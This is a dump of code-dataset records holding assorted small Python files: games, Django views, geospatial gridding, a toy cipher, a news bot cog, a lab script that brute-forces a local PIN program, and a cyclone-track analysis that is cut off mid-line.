self.calc_reward(absolute_state)\n her_states.append(state)\n her_rewards.append(reward)\n\n return her_states, her_rewards\n\n\n\n","sub_path":"HER/envs/picknmove_rel.py","file_name":"picknmove_rel.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570483727","text":"import click\nfrom datetime import datetime, timedelta, date\nfrom dateutil.relativedelta import relativedelta\n\nfrom mla_bilat_agreements import mla_bilat_agreements\n\n\ndef clean_list(organisations, org_list):\n # Extract the comma-separated organisation symbols and removed\n # leading and trailing spaces (strip function)\n orgs = [item.strip() for item in list(set(organisations.split(',')))]\n if len(orgs) < 2:\n raise click.BadOptionUsage(\n option_name=\"orgs\",\n message=\"A comma separated list of at least two \"\n \"organisations must be provided with option --orgs.\")\n orgs = list(set(orgs))\n for org in orgs:\n if not(org in org_list.keys()):\n raise click.BadOptionUsage(\n option_name=\"orgs\",\n message=\"'{:}' is not in the list of \"\n \"the participating organisations.\"\n .format(org))\n return(orgs)\n\n\ndef all_dates(from_, to_):\n dates = []\n delta = to_ - from_\n for d in range(delta.days + 1):\n day = from_ + timedelta(days=d)\n dates.append(day)\n return dates\n\n\ndef add_years(dates, years):\n new_dates = []\n for d in dates:\n d = d + relativedelta(years=years)\n new_dates.append(d)\n return new_dates\n\n\ndef select_possible_dates(dates, from_, to_):\n date_list = []\n for d in dates:\n morning = datetime.combine(d, datetime.min.time())\n evening = datetime.combine(d, datetime.max.time())\n if (morning >= from_) and (evening <= to_):\n date_list.append(d)\n return(date_list)\n\n\ndef gen_start_dates(from_, months):\n date_list = []\n for x in range(months):\n date_list.append(datetime(from_.year, x+1, 1))\n if (from_.day == 1):\n from__month = from_.month\n else:\n from__month = from_.month + 1\n start_date_list = []\n for d in date_list:\n d = d + relativedelta(months=from__month - 1)\n start_date_list.append(d)\n return start_date_list\n\n\ndef bilateral_agreement(lead, partner, submission_dates):\n \"\"\"Checks if there is a collaboration agreement between the two\n organisations 'lead' and 'partner' in the dates included in\n the 'submission_dates' array. If there is an agreement, checks\n if the identified submission dates are covered by the agreement.\"\"\"\n for agreement in mla_bilat_agreements:\n if (lead in agreement['orgs']) and (partner in agreement['orgs']):\n possible_dates = []\n for d in submission_dates:\n if d >= agreement['from'] and d <= agreement['to']:\n possible_dates.append(d)\n return {'agreement': True, 'possible_dates': possible_dates}\n return {'agreement': False, 'possible_dates': []}\n\n\ndef add_comment(comment, new_string):\n if (comment != ''):\n comment += '\\n'\n return comment + new_string\n","sub_path":"mla_tools.py","file_name":"mla_tools.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"120866639","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\ntry: range=xrange\nexcept: pass\n\ndef transform_coordinates(x, y, epsg_in, epsg_out):\n \"\"\"\n Transform between any coordinate system.\n\n Requires pyproj\n \"\"\"\n import pyproj\n proj_in = pyproj.Proj(\"+init=EPSG:\"+str(epsg_in))\n proj_out = pyproj.Proj(\"+init=EPSG:\"+str(epsg_out))\n return pyproj.transform(proj_in, proj_out, x, y)\n\n\ndef trim(coords, data, extent, buffer_amount=0.0):\n \"\"\"\n Grid a smaller section of a large dataset taking into\n consideration transformations into various coordinate\n reference systems (CRS)\n \n Parameters\n ----------\n coords : geographical / projected coordinates\n data : values corresponding to coordinates\n extent : box contained within the data\n buffer : amount of buffer to include (default=0.0)\n\n Returns\n -------\n coords_trim : trimmed coordinates\n data_trim : trimmed data array\n \"\"\"\n xmin, xmax, ymin, ymax = extent\n\n # Extract only the data within the extent\n data_mask = np.ones(data.shape[0], dtype=bool)\n\n # Add a 1 percent buffer zone\n x_buffer = buffer_amount*(xmax - xmin)\n y_buffer = buffer_amount*(ymax - ymin)\n\n mask_e = coords[:,0] < xmin - x_buffer\n mask_w = coords[:,0] > xmax + x_buffer\n mask_n = coords[:,1] < ymin - y_buffer\n mask_s = coords[:,1] > ymax + y_buffer\n data_mask[mask_n] = False\n data_mask[mask_s] = False\n data_mask[mask_e] = False\n data_mask[mask_w] = False\n \n data_trim = data[data_mask]\n coords_trim = coords[data_mask]\n\n return coords_trim, data_trim\n\n\n\ndef grid(coords, data, extent, shape=None, epsg_in=None, epsg_out=None, **kwargs):\n \"\"\"\n Grid a smaller section of a large dataset taking into\n consideration transformations into various coordinate\n reference systems (CRS)\n \n Parameters\n ----------\n coords : geographical coordinates\n data : values corresponding to coordinates\n extent : box contained within the data in espg_out\n coordinates\n shape : size of the box (nrows,ncols)\n : if None, shape is estimated from coords spacing\n epsg_in : CRS of data (if transformation is required)\n epsg_out : CRS of grid (if transformation is required)\n kwargs : keyword arguments to pass to griddata from\n : scipy.interpolate.griddata\n \n Returns\n -------\n grid : rectangular section of data bounded by extent\n \"\"\"\n from scipy.interpolate import griddata\n xmin, xmax, ymin, ymax = extent\n \n if type(epsg_in) != type(None):\n xt, yt = transform_coordinates(np.array([xmin, xmin, xmax, xmax]),\\\n np.array([ymin, ymax, ymin, ymax]),\\\n epsg_out, epsg_in)\n # find the coordinates that will completely\n # engulf the extent\n xtmin, xtmax = min(xt), max(xt)\n ytmin, ytmax = min(yt), max(yt)\n else:\n xtmin, xtmax = xmin, xmax\n ytmin, ytmax = ymin, ymax\n\n xtextent = [xtmin, xtmax, ytmin, ytmax]\n\n # trim data - buffer = 1%\n coords_trim, data_trim = trim(coords, data, xtextent, 0.01)\n\n\n if type(epsg_in) != type(None):\n # convert back to output CRS\n xtrim, ytrim = transform_coordinates(coords_trim[:,0],\\\n coords_trim[:,1],\\\n epsg_in, epsg_out)\n coords_trim = np.column_stack([xtrim, ytrim])\n\n\n if shape == None:\n # estimate based on the data spacing\n xunique = np.unique(coords_trim[:,0])\n yunique = np.unique(coords_trim[:,1])\n dx = np.diff(xunique).mean()\n dy = np.diff(yunique).mean()\n nc = int((xtmax - xtmin)/dx)\n nr = int((ytmax - ytmin)/dy)\n print(\"using nrows={}, ncols={} with cell spacing of {}\".format(nr,nc,(dy,dx)))\n else:\n nr, nc = shape\n\n # interpolate\n\n xcoords = np.linspace(xmin, xmax, nc)\n ycoords = np.linspace(ymin, ymax, nr)\n xq, yq = np.meshgrid(xcoords, ycoords)\n\n vq = griddata(coords_trim, data_trim, (xq, yq), **kwargs)\n return vq\n\n\ndef optimise_surfaces(surface1, surface2, sigma):\n \"\"\"\n Optimise the misfit between surface1 and surface2\n\n surface1 and surface2 are normalised between 0 and 1\n and their residual is minimised, weighted by sigma\n\n Parameters\n ----------\n surface1 : starting surface (can be flat)\n surface2 : surface to match to\n sigma : uncertainty of fitting coefficients\n\n Returns\n -------\n surface3 : optimised surface\n\n Notes\n -----\n The Krylov method uses a Krylov approximation for the\n inverse Jacobian as it is suitable for large problems\n \"\"\"\n from scipy.optimize import root\n \n def objective_function(x, x0, sigma_x0):\n return (x - x0)**2/sigma_x0**2\n \n sigma = sigma.ravel()\n \n s1 = surface1.flatten()\n s1 -= s1.min()\n s1 /= s1.max()\n \n s2 = surface2.flatten()\n s2 -= s2.min()\n s2 /= s2.max()\n \n # starting point should be at prior\n x0 = s1\n \n sol = root(objective_function, x0, method='krylov')\n return sol.x.reshape(surface1.shape)\n","sub_path":"pycurious/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651597845","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nX = np.linspace(-6, 6, 1024)\nY = np.sinc(X)\n\nX_detail = np.linspace(-3, 3, 1024)\nY_detail = np.sinc(X_detail)\n\nplt.plot(X, Y, c = 'k')\n\nsub_axes = plt.axes([.6, .6, .25, .25])\nsub_axes.plot(X_detail, Y_detail, c = 'k')\n\nplt.setp(sub_axes)\n\nplt.show()","sub_path":"Aula 02/Exercicio 03 - Resumo - Capitulo 04/Exemplo_05.py","file_name":"Exemplo_05.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152977323","text":"def start(score, game_id):\n #defining every library needed\n import sys\n import pygame\n import os\n import menu\n import astrodoge\n import spacestrike\n import SpaceBound\n import Stranded\n import sumo_smash\n import cheat_sheet\n import soundboard\n import highscore\n from time import sleep\n\n #setting variables\n FPS = 30\n X = 500\n Y = 100\n WHITE = (255, 255, 255)\n BLACK = (0, 0, 0)\n\n #setting the settings of pygame itself\n screen = pygame.display.set_mode((900,900))\n pygame.display.set_caption(\"Welp, you can always try again!\")\n font = pygame.font.Font('resource/fonts/Arcadepix.ttf', 40)\n clock = pygame.time.Clock()\n os.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (X,Y)\n define_location = \"main_menu\"\n \n #initializing pygame's mixer\n # pygame.mixer.init()\n # pygame.mixer.music.load(\"resource/music/main_menu/main_menu.ogg\")\n # pygame.mixer.music.play(-1)\n\n #initiate a image loader\n def load_image(name):\n image = pygame.image.load(name)\n return image\n \n #create a sprite class to animate \n class animated_select_planet(pygame.sprite.Sprite):\n def __init__(self):\n super(animated_select_planet, self).__init__()\n self.images = []\n self.images.append(load_image('resource/images/game_over/tekst/game_over_1.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_2.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_3.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_4.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_5.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_6.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_7.png'))\n self.index = 0\n self.image = self.images[self.index]\n self.rect = pygame.Rect(25, 130, 250, 80)\n\n def update(self):\n self.index += 1\n sleep(0.1)\n if self.index >= len(self.images):\n self.index = 0\n count = 0\n self.image = self.images[self.index]\n\n #start the main menu board.\n def start_game_over():\n #set background\n background = pygame.image.load('resource/images/game_over/game_overbg.png').convert()\n background_rect = background.get_rect()\n screen.blit(background, background_rect)\n buttons_game_over()\n #game over buttons ready\n def buttons_game_over():\n quit_button = pygame.image.load('resource/images/game_over/button_quit.png').convert()\n retry_button = pygame.image.load('resource/images/game_over/button_restart.png').convert()\n quit_rect = quit_button.get_rect()\n retry_rect = quit_button.get_rect()\n screen.blit(quit_button, (325,550))\n screen.blit(retry_button, (325,470))\n #score text to screen\n def text_score(score, highscore): \n scoretext = font.render(\"Your Score \", 1, WHITE)\n score = font.render(\" {0}\".format(score), 1, WHITE)\n scorehightext = font.render(\"Your highscore \", 1, WHITE)\n scorehigh = font.render(\" {0}\".format(highscore), 1, WHITE)\n screen.blit(scoretext, (250, 385))\n screen.blit(score, (250, 415))\n screen.blit(scorehightext, (500, 385))\n screen.blit(scorehigh, (500, 415))\n\n\n\n #beginning of the main loop\n main_loop = True\n soundboard.game_over(score) \n my_sprite = animated_select_planet()\n my_group = pygame.sprite.Group(my_sprite)\n highscore.save(score, game_id)\n \n while main_loop:\n #reset the screen and set screen image's\n screen.fill(BLACK)\n clock.tick(FPS)\n start_game_over()\n my_group.update()\n my_group.draw(screen)\n highscorer = highscore.read(game_id)\n text_score(score, highscorer)\n pygame.display.flip()\n\n #check events\n for evento in pygame.event.get():\n #define event's of quiting the game.\n if evento.type == pygame.QUIT:\n pygame.quit()\n quit()\n #printing every event that's happening within the python script.\n print(evento)\n #Catch mouse position and if it's pressed on the button\n if evento.type == pygame.MOUSEBUTTONDOWN:\n if pygame.mouse.get_pos()[0] >= 325 and pygame.mouse.get_pos()[1] >= 550:\n if pygame.mouse.get_pos()[0] <= 593 and pygame.mouse.get_pos()[1] <= 615:\n menu.start_menu()\n if pygame.mouse.get_pos()[0] >= 315 and pygame.mouse.get_pos()[1] >= 470:\n if pygame.mouse.get_pos()[0] <= 593 and pygame.mouse.get_pos()[1] <= 535:\n cheat_sheet.start(game_id)\n \n pygame.quit()\n quit()\n","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249585450","text":"n = int(input(\"Enter a 3-digit number: \"))\r\n\r\nz = n % 10\r\nn = n // 10\r\n\r\ny = n % 10\r\nn = n // 10\r\n\r\nx = n % 10\r\nn = n // 10\r\n\r\n# get largest number\r\nlargest = x\r\n\r\nif y >= largest and y >= z:\r\n largest = y\r\n\r\nif z >= largest and z >= y:\r\n largest = z\r\n\r\nprint(\"Largest digit: \" + str(largest))\r\n\r\n# get smallest number\r\nsmallest = x\r\n\r\nif y <= smallest and y <= z:\r\n smallest = y\r\n\r\nif z <= smallest and z <= y:\r\n smallest = z\r\n\r\nprint(\"Smallest digit: \" + str(smallest))\r\n\r\nmiddle = z\r\n\r\nif (largest == z and smallest == y) or (smallest == z and largest == y):\r\n middle = x\r\nelif (largest == z and smallest == x) or (smallest == z and largest == x):\r\n middle = y\r\n\r\nmax_number = largest * 100 + middle * 10 + smallest\r\nmin_number = smallest * 100 + middle * 10 + largest\r\n\r\nprint(\"Max number with those digits is: \" + str(max_number))\r\nprint(\"Min number with those digits is: \" + str(min_number))\r\n","sub_path":"Week 1/Task 23.py","file_name":"Task 23.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"180657649","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .import forms\nfrom .models import SubsidyTypes\n\n\ndef subsidy_types(request):\n # login_id = request.session['logid']\n model_object = SubsidyTypes.objects.all()\n\n if request.method == 'POST':\n form = forms.SubTypeForms(request.POST, request.FILES)\n if form.is_valid():\n subtypeobj = form.cleaned_data\n subtypename = subtypeobj['subsidy_type_name']\n subtypesub = subtypeobj['subsidy_type_sub_perc']\n subtypeself = subtypeobj['subsidy_type_self_perc']\n sp = SubsidyTypes(subsidy_type_name=subtypename, subsidy_type_sub_perc=subtypesub, subsidy_type_self_perc=subtypeself)\n sp.save()\n return redirect('subsidy_types:SubTypeForms')\n else:\n form = forms.SubTypeForms\n\n return render(request, \"subsidy_types/sub_types.html\", {'form': form, 'data': model_object})\n\n\ndef edit_subtypes(request, pk):\n template = 'subsidy_types/sub_types.html'\n post = get_object_or_404(SubsidyTypes, pk=pk)\n model_object = SubsidyTypes.objects.all()\n if request.method == 'POST':\n form = forms.SubTypeForms(request.POST, instance=post)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n return redirect('subsidy_types:SubTypeForms')\n else:\n form = forms.SubTypeForms(instance=post)\n context = {\n 'form': form,\n 'post': post,\n 'data': model_object,\n }\n return render(request, template, context)\n\n\ndef delete_subtypes(request, pk):\n post = get_object_or_404(SubsidyTypes, pk=pk)\n post.delete()\n return redirect('subsidy_types:SubTypeForms')\n","sub_path":"Gconnect/subsidy_types/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"322892337","text":"otp = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\",\" \"]\n\nkey = list(open(\"chiave.txt\").read())\n\ndef appendOut(letter,idx):\n tmp = otp.index(letter) + otp.index(key[idx])\n if tmp > len(otp) - 1:\n tmp -= len(otp)\n return otp[tmp]\n\ndef cifra(text):\n output = \"\"\n daCifrare = list(text)\n i = 0\n for x in daCifrare:\n if i < len(key):\n output += appendOut(x,i)\n else:\n i = 0\n output += appendOut(x,i)\n i += 1\n\n f = open(\"cifrato.txt\",\"w\")\n f.write(output)\n f.close()\n\ncifra(input(\"Testo da cifrare: \").upper())","sub_path":"UFCrypto/Primo Esercizio/cifra.py","file_name":"cifra.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"50807485","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nn=input('digite a quantidade de elementos:')\na=[]\n\nfor i in range(0,len(a),1):\n a.append(input('digite um elemento:'))\n\nsomai=0\nconti=0\nfor i in range(0,len(a),1):\n if a[i]%2==1:\n somai=somai+a[i]\n conti=conti+1\n\nsomap=0\ncontp=0\nfor i in range(0,len(a),1):\n if a[i]%2==0:\n somap=somap+a[i]\n contp=contp+1\n\nprint(somai)\nprint(somap)\nprint(conti)\nprint(contp)\nprint(len(a))\n \n \n \n \n \n \n \n \n","sub_path":"moodledata/vpl_data/45/usersdata/97/15557/submittedfiles/lista1.py","file_name":"lista1.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222881324","text":"##############################################################################\r\n################################ IMPORTS: ####################################\r\n##############################################################################\r\nimport sys\r\nimport random\r\nimport string\r\n\r\n##############################################################################\r\n############################## FUNCTIONS: ####################################\r\n##############################################################################\r\ndef game(NumberOfDigits):\r\n\t\"\"\"This function takes in the number of digits and generates a random \r\n\tstring confirming to the specified number of digits. It then asks the user \r\n\tto guess the random number while providing basic feedback to the user \r\n\tdepending on his/her guesses. The funtion terminates once the user has \r\n\tguessed the numner correctly or exhausted his trials\r\n\t\"\"\"\r\n\tNum_Str = ''.join(random.choice(string.digits) for _ in range(NumberOfDigits)) #Generating a random number of the specified number of digits\r\n\t# Num_Str = '007'\r\n\tNumberOfTries = 0\r\n\tMaxTries = (2**NumberOfDigits) + NumberOfDigits\r\n\tBull = 0\r\n\tCow = 0\r\n\r\n\tprint (\"Let's play the mimsmind1 game. You have {0} guesses.\" .format(MaxTries))\r\n\r\n\tGuessStr = raw_input(\"Guess a {0}-digit number: \" .format(NumberOfDigits))\r\n\tNumberOfTries += 1\r\n\twhile True:\t\t\t\t\t\t\t#This loop with keep asking the user to guess the number till he/she guesses the correct number\r\n\t\tif NumberOfTries >= MaxTries:\r\n\t\t\tprint (\"Sorry. You did not guess the number in {0} tries. The correct number is {1}\" .format(MaxTries, Num_Str))\r\n\t\t\tbreak\r\n\t\ttry:\t\t\t\t\t\t\t#Validating whether the given input is a valid integer\r\n\t\t\tGuessNum = int(GuessStr)\r\n\t\texcept:\r\n\t\t\tGuessStr = raw_input(\"Invalid input. Try again: \")\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tif len(GuessStr) != NumberOfDigits:\t\t#Validating whether the given input contains the specified number of digits\r\n\t\t\t\tGuessStr = raw_input(\"Invalid input. Try again: \")\r\n\t\t\t\tcontinue\r\n\t\t\telif GuessStr == Num_Str:\r\n\t\t\t\tprint (\"Congratulations. You guessed the correct number in {0} tries\" .format(NumberOfTries))\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tBull = 0\r\n\t\t\t\tCow = 0\r\n\t\t\t\tfor i in range(len(GuessStr)):\t\t#This loop will count the number of bulls\r\n\t\t\t\t\tfor j in range(len(Num_Str)):\r\n\t\t\t\t\t\tif GuessStr[i] == Num_Str[j] and i == j:\r\n\t\t\t\t\t\t\tBull += 1\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\tTemp_Num_Str = Num_Str \t\t\t\t#Making a temporary variable to store the random generated number for the next guess\r\n\t\t\t\tfor letter in GuessStr:\t\t\t\t#This loop will count the number of cows (including bulls)\r\n\t\t\t\t\tif letter in Temp_Num_Str:\r\n\t\t\t\t\t\tindex = Temp_Num_Str.find(letter)\r\n\t\t\t\t\t\tCow += 1\r\n\t\t\t\t\t\tTemp_Num_Str = Temp_Num_Str[:index] + Temp_Num_Str[index+1:]\r\n\t\t\t\t\t\t\r\n\t\t\t\tCow = Cow - Bull\t\t\t\t\t#Removing the double counts in cows\r\n\t\tGuessStr = raw_input(\"{0} bull(s), {1} cow(s). Try again: \" .format(Bull,Cow))\r\n\t\tNumberOfTries += 1\t\t\t\t\t\t\t#Incrementing the trial counter\r\n\r\n##############################################################################\r\n################################ MAIN: #######################################\r\n##############################################################################\r\ndef main():\r\n\ttry:\r\n\t\tNumberOfDigits = int(sys.argv[1])\r\n\texcept:\r\n\t\tNumberOfDigits = 3\r\n\tgame(NumberOfDigits)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"mimsmind1.py","file_name":"mimsmind1.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444972004","text":"from discord.ext import commands\nfrom BotUtils import REST, getAPIKey, escapeURL, isURL\nimport discord\nfrom datetime import datetime\n\nclass News(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n \n @commands.command(name='news')\n async def NewsAPI(self, ctx, *, query):\n \"\"\"Gets news\"\"\"\n data = await REST(f\"http://newsapi.org/v2/everything?qInTitle={escapeURL(query)}&from={datetime.now().strftime('%Y-%m-%d')}&sortBy=popularity&pageSize=1&apiKey={getAPIKey('newsapi')}\")\n\n if len(data['articles']) == 0:\n await ctx.reply('No articles found.')\n return\n data = data['articles'][0]\n embed = discord.Embed(colour=0xf5c518)\n embed.title = data['title']\n embed.url = data['url']\n embed.description = data['description']\n embed.timestamp = datetime.fromisoformat(data['publishedAt'].replace('Z',''))\n if 'urlToImage' in data and isURL(str(data['urlToImage'])):\n embed.set_image(url=data['urlToImage'])\n embed.set_footer(text=f\"{data['source']['name']} | Written by {data['author']}. Published \")\n await ctx.reply(embed=embed)\n\ndef setup(bot):\n bot.add_cog(News(bot))\n","sub_path":"cogs/apis/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139062931","text":"from django.urls import path, re_path\nfrom . import views\n\nurlpatterns = [\n\n # /home/\n path('', views.index, name='index'),\n\n # /f1better/index.html\n path('index.html', views.index, name='index'),\n\n path('register', views.register, name='register'),\n path('register.html', views.register, name='register'),\n\n path('login', views.login, name='login'),\n path('login.html', views.login, name='login'),\n\n path('logout', views.logout, name='logout'),\n]","sub_path":"f1better/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"466108956","text":"import numpy as np\nimport math\nfrom collections import defaultdict\n\n\nclass Point(object):\n \"\"\"docstring for Point\"\"\"\n def __init__(self, x,y):\n super(Point, self).__init__()\n self.x = x\n self.y = y\n\n def dist(self, other):\n assert isinstance(other, Point)\n \n xd = self.x - other.x\n yd = self.y - other.y\n return math.sqrt( xd**2 + yd**2 )\n\n def __str__(self):\n return \"{},{}\".format(self.x, self.y)\n\n @classmethod\n def from_str(cls, s):\n x,y = map(int, s.split(','))\n return cls(x,y)\n \n\ndef precision_recall(pred_dict, truth_dict, R, N_classes=4):\n \"\"\" returns a N_classes x 3 matrix where the rows correspond to classes\n and the cols correspond to the counts of [correct, predicted, actual]\n \"\"\"\n output = np.zeros((N_classes, 3))\n\n # count true\n for label in truth_dict.values():\n output[label,2] += 1\n\n # count predicted\n for label in pred_dict.values():\n output[label,1] += 1\n\n # load predictions into dict by label\n predictions_by_label = defaultdict(set)\n for coords, label in pred_dict.iteritems():\n pt = Point.from_str(coords)\n predictions_by_label[label].add(pt)\n\n # count correct\n # iterate over true points\n # for each, see if there's a nearby\n # prediction that matches the label\n for coords, label in truth_dict.iteritems():\n pt = Point.from_str(coords)\n\n #print \"Looking for {} near {}\".format(label, pt)\n\n for pred in predictions_by_label[label]:\n #print \"\\tTrying {}\\t{:07.1} away\".format(pred, pt.dist(pred))\n if pt.dist(pred) <= R:\n #print \"Found a correct\"\n output[label,0] += 1\n break\n\n return output\n\ndef partition_based_on_correctness(pred_dict, truth_dict, R):\n ''' given two dictionaries of points, one true, and one predicted,\n this function partitions the predicted points into \"correct\"\n and \"incorrect\" sets for each class.\n '''\n gt_by_label = defaultdict(set)\n for coords, label in truth_dict.iteritems():\n pt = Point.from_str(coords)\n gt_by_label[label].add(pt)\n\n cor_preds_by_label = defaultdict(set)\n inc_preds_by_label = defaultdict(set)\n for coords, label in pred_dict.iteritems():\n pt = Point.from_str(coords)\n\n for truth in gt_by_label[label]:\n if truth.dist(pt) < R:\n cor_preds_by_label[label].add(pt)\n continue\n if pt not in cor_preds_by_label[label]:\n inc_preds_by_label[label].add(pt)\n\n correct = {}\n incorrect = {}\n for label in cor_preds_by_label:\n for pt in cor_preds_by_label[label]:\n correct[str(pt)] = label\n\n for label in inc_preds_by_label:\n for pt in inc_preds_by_label[label]:\n incorrect[str(pt)] = label\n\n return correct, incorrect\n","sub_path":"old/precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191952911","text":"import subprocess\nfrom subprocess import run, Popen, PIPE, STDOUT\nfrom sys import exit\n\n# session = subprocess.Popen(['access.sh'], stdout=PIPE, stderr=PIPE)\n# stdout, stderr = session.communicate()\n\nfor i in range(10):\n for j in range(10):\n for k in range(10):\n p = Popen(['./access'], stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n guess = i*1000 + j*100 + k*10 + 8\n str_input = f'david\\n{guess}\\n'\n stdout = p.communicate(input=str.encode(str_input))[0]\n str_output = stdout.decode()\n print(str_output)\n if \"S\" in str_output: # S is in 'Success.' but not 'Incorrect.' # substring search unnecessarily slow but only 1000 combinations to check anyway\n print(f'Found david\\'s PIN: {guess}')\n exit(0)\n\n# if didn't find pin, we failed\nexit(1)\n","sub_path":"lab0/break.py","file_name":"break.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335786063","text":"import sys\ndef convert(cel):\n # calculate fahrenheit\n fahrenheit = (cel * 1.8) + 32\n print('%0.1f degree Celsius = %0.1f degree Fahrenheit' % (cel, fahrenheit))\n\nif __name__ == '__main__':\n arg = sys.argv\n n = float(arg[1])\n convert(n)\n","sub_path":"code/celsius.py","file_name":"celsius.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188187023","text":"from python.Tracks.TracksDB import TracksDB\nimport xlsxwriter\nimport pandas as pd\n\nstart_year = 1979\nend_year = 2017 # 2011\n\nspawn_lat1 = 30\nspawn_lat2 = 38\nspawn_lon1 = 30\nspawn_lon2 = 38\n\nparent_zone_lon1 = 25\nparent_zone_lon2 = 45\n\nminimum_radius_48 = 350\n\nexcel_headlines = ['Date', 'Lat Daughter', 'Lon Daughter', 'Length', 'SLP Value', 'SLP Gradient',\n 'Radius', 'Max Radius 48', 'RST -6', 'Track Number']\nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\ndays_in_month = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndf = pd.read_excel('C:/Users/hatzv/Documents/Geography/RSTs/python/Analysis/Results/RST_classification_all_hours_ERA_1979-2016.xlsx', 'Sheet')\n\n# counter = 0\nfinal_list = [excel_headlines]\nfor current_year in range(start_year, end_year+1):\n tr_db = TracksDB(current_year)\n total_tracks = tr_db.get_total_tracks()\n for current_track in range(total_tracks):\n track = tr_db.get_track(current_track)\n if len(track) >= 5: # 24 hours or longer tracks\n first_low = track[0]\n lat_first = tr_db.get_low_lat_degrees(first_low)\n lon_first = tr_db.get_low_lon_degrees(first_low)\n if (lat_first > spawn_lat1) and (lat_first < spawn_lat2) and (lon_first > spawn_lon1) and (lon_first < spawn_lon2): # Inside spawn area\n # Check for radius is first 48 hours. Only those of which are larger han 350Km are used.\n start_radius = tr_db.get_low_radius(track[0])\n max_radius_48 = start_radius\n for low in range(min(len(track), 7)):\n low_num = track[low]\n if low_num > 0:\n radius = tr_db.get_low_radius(low_num)\n if radius > max_radius_48:\n max_radius_48 = radius\n if max_radius_48 >= minimum_radius_48: # Low gets deep enough\n # Find the RST classification 6 hours prior to the low.\n # print(counter)\n time_first_low = tr_db.get_low_time(first_low, return_format='string')\n hour = int(time_first_low[11:])\n day = int(time_first_low[8:10])\n month_int = int(time_first_low[5:7])\n month = months[month_int-1]\n year = int(time_first_low[0:4]) # Not the current_year because each DB file starts in YEAR and ends with YEAR+1\n if year < 2017:\n if hour == 0:\n hour = 18\n day -= 1\n if day == 0:\n month_int -=1\n if month_int == 0:\n day = days_in_month[-1]\n month = months[-1]\n year -= 1\n else:\n day = days_in_month[month_int-1]\n month = months[month_int-1]\n else:\n hour = hour - 6\n\n rst_class_minus_6 = df[(df['Month'] == month) & (df['Day'] == day) & (df['Hour'] == hour)][year]\n rst_class_minus_6 = rst_class_minus_6.get_values()[0]\n if type(rst_class_minus_6) is not str: # In case the date is 1st of March, in which case we look for Feb 28\n rst_class_minus_6 = df[(df['Month'] == month) & (df['Day'] == day-1) & (df['Hour'] == hour)][year]\n rst_class_minus_6 = rst_class_minus_6.get_values()[0]\n\n if rst_class_minus_6 != \"No RST\":\n slp_first = tr_db.get_low_lon_slp_value(first_low)\n gradient_first = tr_db.get_low_gradient(first_low)\n radius_first = tr_db.get_low_radius(first_low)\n track_length = len(track)\n final_list.append([time_first_low, lat_first, lon_first, track_length, slp_first,\n gradient_first, radius_first, max_radius_48, rst_class_minus_6, current_track])\n\n # counter += 1\n\n# Create an new Excel file and add a worksheet.\nworkbook = 